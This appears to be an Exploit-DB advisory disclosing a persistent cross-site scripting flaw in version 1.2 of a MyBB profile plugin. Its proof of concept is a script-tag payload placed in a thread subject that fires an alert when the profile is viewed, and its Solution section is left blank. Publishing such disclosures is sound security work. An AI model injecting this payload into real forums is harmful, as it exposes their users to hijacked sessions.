MyBB Plugin Last User's Threads in Profile Plugin 1.2 - Persistent Cross-Site Scripting

EDB-ID: 44339
Author: 0xB9
Published: 2018-03-23
Type: Webapps
Platform: PHP
Aliases: N/A
Advisory/Source: N/A
Tags: Cross-Site Scripting (XSS)
Vulnerable App: Download Vulnerable Application

 # Date: 3/19/2018 
# Author: 0xB9
# Contact: or 0xB9[at]
# Software Link:
# Version: v1.2
# Tested on: Ubuntu 17.10

1. Description:
Display last threads in user profile.

2. Proof of Concept:

Persistent XSS
- Create a thread with the following subject <p """><SCRIPT>alert("XSS")</SCRIPT>">
- Now visit your profile to see the alert.

3. Solution:


Related Posts